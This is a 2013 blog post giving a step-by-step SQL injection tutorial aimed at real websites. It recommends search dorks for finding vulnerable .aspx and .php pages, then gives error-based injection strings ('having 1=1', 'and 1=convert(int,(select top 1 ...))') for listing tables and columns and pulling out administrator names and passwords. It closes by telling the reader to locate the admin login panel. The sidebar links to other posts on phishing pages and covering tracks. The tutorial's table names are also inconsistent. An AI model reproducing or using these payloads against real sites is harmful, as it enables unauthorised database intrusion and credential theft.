Which Anti Virus

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Saturday, 6 April 2013

Hacking Aspx / Php websites (ACTIVE SQL INJECTION)

Posted on 10:42 by Unknown




hey guys in this tutorial i will show you how to make a injection on a aspx based website. 

1) seach aaspx website. 
for this step you can use one of this dorks 

".aspx?bookID= "    OR        ".php?id= "

2) If you found one lets check if the website is vulnverable. Add this text after the url 
"order by 1--" 
example : http://www.target.com/index.aspx?Id=1 order by 1-- 
Now you will get a Error : "Page not found" or something like that. 

3) Lets go on and begin with the Injection the first step of every injection is to find out the columns. 
for this step we use : 
"having 1=1" 
you only have to copy it behind the url 
example : http://www.target.com/index.aspx?Id=1 having 1=1 

4) Well lets go on and search the tables. Use this code for it 
and 1=convert 
example : http://www.target.com/index.aspx?Id=1 and 1=convert 
The output is the first table of the databse. But this table don't helps you . 
You need to find the admin table. 
Use this query to get the next table : 
"and 1=convert 
(int,(select top 1 table_name from information_schema.tables where 
table_name not in ('Tab_FinalOrder')))" 

example : http://www.target.com/index.aspx?Id=1 and 1=convert 
(int,(select top 1 table_name from information_schema.tables where 
table_name not in ('Tab_FinalOrder'))) 

Now we get the name of the admin table. The Admintable name is in this example "Administration" 

5) Now lets get into the table Administration 
use this query for it: 
and 1=convert 

"(int,(select top 1 column_name from information_schema. 
columns where table_name = 'AdminMaster'))" 

example : http://www.target.com/index.aspx?Id=1 and 1=convert 
(int,(select top 1 column_name from information_schema. 
columns where table_name = 'AdminMaster')) 

6) Our results are the tables "AdminName" and "AdminPassword" 
Now have dont the most part of this injection. The last step is to find out Adminname and Adminpassword. 

Query for Admin name : 
"and 1=convert(int,(select top 1 AdminName from Administration))" 
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminName from Administration)) 

Query for Admin pass : 
"and 1=convert(int,(select top 1 AdminPassword from Administration))" 
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminPassword from Administration)) 

7) So now your are nearly finish. You only need to find out the Admin Login Pannel.
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in Hacking | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Different Types Of Computer Ports
  • C Program Library files(Header Files)
    1. <stdio.h>: input and output  function in program. 2. <conio.h>: to clear screen and  pause information function. 3. <ctype...
  • Features Of Android KitKat
    1) The new Phone (Dialer) app is now linked online with Google Maps. This means if your type Big Bazaar in Phone app (Not Search) and if tha...
  • Free Download E-DRAW MAX
    link 1 : http://hotfile.com/dl/ 254163134/8de2252/EDM.rar.html
  • Different Operating System and Their RAM Support
    Windows 8 64 bit Enterprise  Professional : 512 GB Windows 8 64 bit :128 GB Windows 8 32 bit : 4 GB Windows 7 64 bit Ultimate, Enterprise ...
  • How To Protect Your Computer From Keyloggers
    A keylogger is a small program that stores each keystroke a user types on a specific computer's keyboard. It is capable to send log file...
  • GTU Paper Solution and Material as Per GTU syllabus
    Go to this website and download the Study material of GTU Syllabus. http://gtu-paper.blogspot.com/
  • Online Mobile Recharge Websites
    Hey here is the list of websites which helps you to make a online recharge of your mobile. Rechargeitnow.com FastRecharge.com Indiamobilerec...
  • How To Install Android on PC or Laptop
    Android has a got very important place in our Tech World.Now in market you can get many devices running on Android like Smartphones to Table...
  • How to Get Maximum Battery Life in Laptop?
    1. Backlight Levels/ Screen Brightness. ------------------------------ -------------------- You don’t always need the brightest screen for u...

Categories

  • Android
  • Android Apps
  • apps
  • BlackBerry
  • Cprog
  • dfd
  • erd
  • Facebook
  • general
  • Hacking
  • HTC
  • ios
  • java
  • Mobile
  • nokia
  • Samsung
  • Srs
  • Window Apps
  • Windows 8

Blog Archive

  • ▼  2013 (91)
    • ►  November (6)
    • ►  October (5)
    • ►  September (17)
    • ►  August (3)
    • ►  July (8)
    • ►  June (13)
    • ►  May (12)
    • ▼  April (27)
      • Windows 8 - Keyboard shortcuts
      • HTC 8x
      • Cool Wallpapers HD : Get it free
      • Gun N Strike Terrorist : Get it free
      • Temple Run For Windows Mobile
      • BOUNDRY_FILL ALGORITHM
      • E-R Diagram For Airlines Reservation System
      • E-R Diagram For Hospital Management System
      • Bypass School/College/Office Firewall
      • How to Hackers Erase Tracks After Hacking
      • Creating a fake ( Phishing ) page of gmail,faceboo...
      • Recover Password Of --> Linux Ubuntu , Windows XP,...
      • A Virus Program to Restart the Computer at Every S...
      • How To Protect Your Computer From Keyloggers
      • How to get a admin account on a school / Collage PC
      • Increase Firefox Surfing Speed
      • Blocking Ultrasurf with a Sonicwall Firewall
      • Hacking Aspx / Php websites (ACTIVE SQL INJECTION)
      • Will Facebook’s phone gamble with ANDROID / WINDOW...
      • HOW TO : Speed Up Youtube Buffering Speed
      • SRS For Hospital Management System
      • SRS for Library Management System
      • Hack Your Modem and Increase Your Download Speed
      • BlackBerry Z10 coming soon with WXGA resolution
      • Samsung Galaxy Pocket Neo and Galaxy Star with Jel...
      • Loop Mobile DND | Activate Loop Mobile Do Not Dist...
      • Hacking Cyberoam(Bypassing)
Powered by Blogger.

About Me

Unknown
View my complete profile